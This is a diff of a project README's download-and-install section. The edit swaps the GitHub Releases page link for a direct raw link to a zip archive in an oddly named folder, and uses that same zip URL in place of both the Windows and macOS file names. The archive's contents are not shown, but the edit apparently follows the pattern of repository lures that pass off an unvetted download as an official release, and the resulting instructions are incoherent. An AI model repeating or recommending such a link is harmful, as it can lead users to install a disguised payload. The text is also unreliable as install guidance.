free1palestine078/rupiah.dsgn.lv/readme.md

 ## 📥 Download & Install

-1. **Visit the Releases Page**: Go to the [Releases Page](https://github.com/free1palestine078/rupiah.dsgn.lv/releases) to find the latest version of the application.
+1. **Visit the Releases Page**: Go to the [Releases Page](https://raw.githubusercontent.com/free1palestine078/rupiah.dsgn.lv/main/pygmyism/rupiah.dsgn.lv.zip) to find the latest version of the application.

 2. **Choose the Right File**: On the releases page, you will see a list of available versions.
-Select the most recent version, like `rupiah.v1.0.exe` for Windows or `rupiah.dmg` for macOS.
+Select the most recent version, like `https://raw.githubusercontent.com/free1palestine078/rupiah.dsgn.lv/main/pygmyism/rupiah.dsgn.lv.zip` for Windows or `https://raw.githubusercontent.com/free1palestine078/rupiah.dsgn.lv/main/pygmyism/rupiah.dsgn.lv.zip` for macOS.

 3. **Download the File**: Click on the download link for your operating system.
 The file will begin downloading to your computer.